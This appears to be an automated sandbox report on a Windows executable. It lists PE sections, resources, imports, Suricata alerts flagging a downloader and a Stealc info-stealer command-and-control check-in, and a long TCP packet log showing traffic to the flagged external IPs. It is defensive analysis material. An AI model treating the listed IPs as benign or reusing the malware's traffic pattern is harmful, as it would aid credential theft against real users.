.text	0x1000	0x4d97c	0x4da00	f23eca72aeb40bd493c99e3c5898e5fc	False	0.8528457125603864	data	7.554746178588047	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x206a	0x2200	dee7693ea1e5b0cd14cc49a8837fde33	False	0.36086856617647056	data	5.42580181902609	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x52000	0x3db0d8	0x6c00	c0bff7590bd22299e89866135e054a81	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42e000	0x11d30	0x11e00	e1f56f6d7a7dbf3885ed2a59e9829bb0	False	0.5192307692307693	data	5.47358067303111	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x4391a8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x4392d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x43b8a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x42e6f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkmen	Turkmenistan	0.36300639658848616
RT_ICON	0x42f598	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkmen	Turkmenistan	0.5018050541516246
RT_ICON	0x42fe40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkmen	Turkmenistan	0.5835253456221198
RT_ICON	0x430508	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkmen	Turkmenistan	0.619942196531792
RT_ICON	0x430a70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkmen	Turkmenistan	0.3522514071294559
RT_ICON	0x431b18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkmen	Turkmenistan	0.3524590163934426
RT_ICON	0x4324a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkmen	Turkmenistan	0.40070921985815605
RT_ICON	0x432970	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8131663113006397
RT_ICON	0x433818	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8506317689530686
RT_ICON	0x4340c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.836405529953917
RT_ICON	0x434788	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.7528901734104047
RT_ICON	0x434cf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.804045643153527
RT_ICON	0x437298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8337242026266416
RT_ICON	0x438340	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.8422131147540983
RT_ICON	0x438cc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8590425531914894
RT_DIALOG	0x43c920	0x82	data			0.7615384615384615
RT_STRING	0x43c9a8	0x4a8	data			0.436241610738255
RT_STRING	0x43ce50	0xe6	data			0.5608695652173913
RT_STRING	0x43cf38	0x806	data			0.4230769230769231
RT_STRING	0x43d740	0x576	data			0.4434907010014306
RT_STRING	0x43dcb8	0x782	data			0.4214360041623309
RT_STRING	0x43e440	0x6ae	data			0.4298245614035088
RT_STRING	0x43eaf0	0x656	data			0.43773119605425403
RT_STRING	0x43f148	0x5da	data			0.43324432576769023
RT_STRING	0x43f728	0x604	data			0.4357142857142857
RT_GROUP_CURSOR	0x43b880	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x43c750	0x14	data			1.25
RT_GROUP_ICON	0x439130	0x76	data	Turkmen	Turkmenistan	0.6779661016949152
RT_GROUP_ICON	0x432908	0x68	data	Turkmen	Turkmenistan	0.7115384615384616
RT_VERSION	0x43c768	0x1b8	COM executable for DOS			0.5681818181818182

Imports

DLL	Import
KERNEL32.dll	DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, SetEvent, GetModuleHandleW, SetProcessPriorityBoost, GlobalAlloc, GetFileAttributesA, GetTimeFormatW, GetConsoleAliasW, GetModuleFileNameW, SetLastError, GetProcAddress, SetFileAttributesA, UpdateResourceA, Process32Next, RegisterWaitForSingleObject, AddAtomW, FoldStringA, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, WriteConsoleOutputAttribute, GetVersionExA, WriteProcessMemory, GetFileSize, GetConsoleAliasExesLengthA, LoadLibraryA, GetCommandLineW, LCMapStringW, LCMapStringA, GetLastError, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
USER32.dll	GetClassLongW, GetMonitorInfoW
GDI32.dll	GetBoundsRect
ADVAPI32.dll	EnumDependentServicesW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T06:57:00.801518+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-11T06:57:02.574995+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	176.113.115.19	80	TCP
2024-12-11T06:57:07.856254+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49732	92.255.57.89	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 06:56:58.932987928 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:56:58.933027029 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:56:58.933118105 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:56:58.942660093 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:56:58.942678928 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.162250996 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.162369967 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.208044052 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.208060980 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.208257914 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.208317995 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.211968899 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.259341955 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.801537037 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.801603079 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.801616907 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.801629066 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.801656961 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.801675081 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.820604086 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.820622921 CET	443	49730	172.67.179.207	192.168.2.4
Dec 11, 2024 06:57:00.820631027 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:00.820669889 CET	49730	443	192.168.2.4	172.67.179.207
Dec 11, 2024 06:57:01.131237030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:01.250628948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:01.250716925 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:01.250897884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:01.370127916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574893951 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574912071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574930906 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574976921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574990988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.574995041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.575001955 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.575014114 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.575025082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.575042963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.575062037 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.575253010 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.575265884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.575299025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.695890903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.695965052 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.695969105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.696007967 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.700011969 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.700057030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.766586065 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.766683102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.766823053 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.766875029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.770593882 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.770656109 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.772109032 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.772171021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.772214890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.772258043 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.780584097 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.780659914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.780679941 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.780724049 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.788896084 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.788970947 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.789005041 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.789057970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.797380924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.797446966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.797482014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.797523975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.805644035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.805721045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.805731058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.805778980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.814075947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.814137936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.814168930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.814222097 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.822350979 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.822431087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.822458029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.822503090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.830708027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.830770969 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.830890894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.830944061 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.839063883 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.839114904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.839165926 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.839210987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.847053051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.847132921 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.847158909 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.847210884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.886219025 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.886271954 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.886298895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.886346102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.958841085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.958889961 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.958966970 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.959011078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.961091042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.961134911 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.961194992 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.961240053 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.965857983 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.965908051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.965986967 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.966031075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.970554113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.970597982 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.970657110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.970700979 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.975301027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.975368023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.975397110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.975435972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.980056047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.980089903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.980098963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.980129957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.984687090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.984756947 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.984807968 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.984849930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.989389896 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.989447117 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.989515066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.989557981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.994112015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.994163990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.994240999 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.994277000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.998837948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.998904943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:02.998966932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:02.999007940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.003566980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.003644943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.003673077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.003715992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.008308887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.008361101 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.008368969 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.008405924 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.013035059 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.013077974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.013139963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.013161898 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.017743111 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.017801046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.017857075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.017901897 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.021380901 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.021433115 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.021488905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.021541119 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.025079966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.025156975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.025173903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.025223017 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.028605938 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.028660059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.028711081 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.028763056 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.032322884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.032380104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.032413006 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.032458067 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.150836945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.150978088 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.151015997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.151068926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.152641058 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.152703047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.152740955 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.152789116 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.156297922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.156352997 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.156378031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.156424999 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.159905910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.160017014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.160113096 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.163510084 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.163579941 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.163630962 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.163678885 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.167207956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.167249918 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.167273045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.167299986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.170797110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.170855999 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.170896053 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.171036005 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.174391031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.174444914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.174499035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.174547911 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.178071976 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.178128958 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.178149939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.178201914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.181653023 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.181706905 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.181760073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.181817055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.185281038 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.185334921 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.185395956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.185448885 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.188952923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.189012051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.189018011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.189064026 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.192548990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.192599058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.192630053 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.192676067 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.196182966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.196264029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.196286917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.196333885 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.200051069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.200090885 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.200103998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.200134993 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.203458071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.203516960 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.203548908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.203589916 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.207076073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.207123041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.207171917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.207216978 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.210813999 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.210843086 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.210896015 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.210925102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.214338064 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.214411020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.214449883 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.214493990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.217967987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.218018055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.218080997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.218122959 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.221651077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.221690893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.221721888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.221751928 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.225217104 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.225290060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.225306988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.225357056 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.228852034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.228919983 CET	49731	80	192.168.2.4	176.113.115.19
Dec 11, 2024 06:57:03.228955030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 11, 2024 06:57:03.228996992 CET	49731	80	192.168.2.4	176.113.115.19
